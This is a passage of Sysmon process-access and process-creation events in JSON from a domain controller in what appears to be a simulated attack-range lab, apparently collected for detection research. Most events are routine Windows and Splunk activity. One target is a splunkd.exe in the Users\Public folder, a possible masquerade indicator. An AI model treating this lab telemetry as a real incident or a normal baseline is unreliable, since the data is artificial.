07:01:56.654","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:56","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8228,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:56.654\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:56.654","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:56","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8229,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:56.654\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:56.654","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:56","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8230,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:56.654\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:56.654","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:56","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8231,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:56.654\r\nSourceProcessGUID: {E2A3D6B1-1103-5F25-0000-0010F6780500}\r\nSourceProcessId: 3336\r\nSourceThreadId: 1980\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {E2A3D6B1-1352-5F25-0000-0010DA120E00}\r\nTargetProcessId: 2464\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:56.654","SourceProcessGUID":"{E2A3D6B1-1103-5F25-0000-0010F6780500}","SourceProcessId":"3336","SourceThreadId":"1980","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{E2A3D6B1-1352-5F25-0000-0010DA120E00}","TargetProcessId":"2464","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:56","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:56","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8232,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:56.794\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3596\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:56.794","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3596","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 07:01:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":8233,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:57.326\r\nProcessGuid: {E2A3D6B1-1365-5F25-0000-0010A96F0E00}\r\nProcessId: 1364\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe\r\nFileVersion: 8.0.2\r\nDescription: Active Directory monitor\r\nProduct: splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: splunk-admon.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {E2A3D6B1-1058-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165\r\nParentProcessGuid: {E2A3D6B1-1103-5F25-0000-00101A740500}\r\nParentProcessId: 1828\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:01:57.326","ProcessGuid":"{E2A3D6B1-1365-5F25-0000-0010A96F0E00}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe","FileVersion":"8.0.2","Description":"Active Directory monitor","Product":"splunk Application","Company":"Splunk Inc.","OriginalFileName":"splunk-admon.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{E2A3D6B1-1058-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165","ParentProcessGuid":"{E2A3D6B1-1103-5F25-0000-00101A740500}","ParentProcessId":"1828","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 07:01:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8234,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:57.326\r\nSourceProcessGUID: {E2A3D6B1-1103-5F25-0000-00101A740500}\r\nSourceProcessId: 1828\r\nSourceThreadId: 1376\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {E2A3D6B1-1365-5F25-0000-0010A96F0E00}\r\nTargetProcessId: 1364\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:57.326","SourceProcessGUID":"{E2A3D6B1-1103-5F25-0000-00101A740500}","SourceProcessId":"1828","SourceThreadId":"1376","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{E2A3D6B1-1365-5F25-0000-0010A96F0E00}","TargetProcessId":"1364","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:57","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8235,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:57.326\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 1212\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1365-5F25-0000-0010A96F0E00}\r\nTargetProcessId: 1364\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:57.326","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"1212","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1365-5F25-0000-0010A96F0E00}","TargetProcessId":"1364","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:01:58","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
